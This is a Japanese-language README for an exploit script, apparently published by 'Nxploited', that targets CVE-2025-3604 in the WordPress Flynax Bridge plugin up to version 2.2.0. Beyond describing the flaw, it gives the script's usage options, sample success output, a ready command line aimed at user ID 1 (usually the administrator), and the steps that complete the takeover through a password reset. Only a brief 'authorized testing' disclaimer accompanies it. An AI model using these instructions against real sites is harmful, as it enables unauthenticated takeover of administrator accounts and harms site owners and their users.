
Flynax Bridge <= 2.2.0 - アカウント乗っ取りによる未認証の権限昇格
WordPress用のFlynax Bridgeプラグインは、2.2.0 までの全バージョンにおいて、アカウント乗っ取りによる権限昇格に対して脆弱です。
これは、プラグインがユーザーのアカウント情報(メールアドレスなど)を更新する前に、ユーザーの身元を適切に検証していないことが原因です。その結果、認証されていない攻撃者が管理者を含む任意のユーザーのメールアドレスを変更し、その後パスワードリセットを開始することで、アカウントを完全に乗っ取ることができます。
CVE: CVE-2025-3604
CVSS: 9.8 (Critical)
公開日: 2025年4月23日
最終更新日: 2025年4月24日
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
悪用に成功すると、攻撃者はWordPressのログインページに移動し、新しく設定されたメールアドレスを使用して**「パスワードをお忘れですか?」**をクリックし、パスワードをリセットして対象アカウントへの完全なアクセスを獲得できます。
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: WordPressサイトのベースURL。-id: 対象となるユーザーのID(通常、管理者は1)。-mail: そのユーザーに設定される新しいメールアドレス。自己責任で使用してください。認可されたテストおよび教育目的のみに使用できます。
BY: Nxploited ( Khaled_alenazi )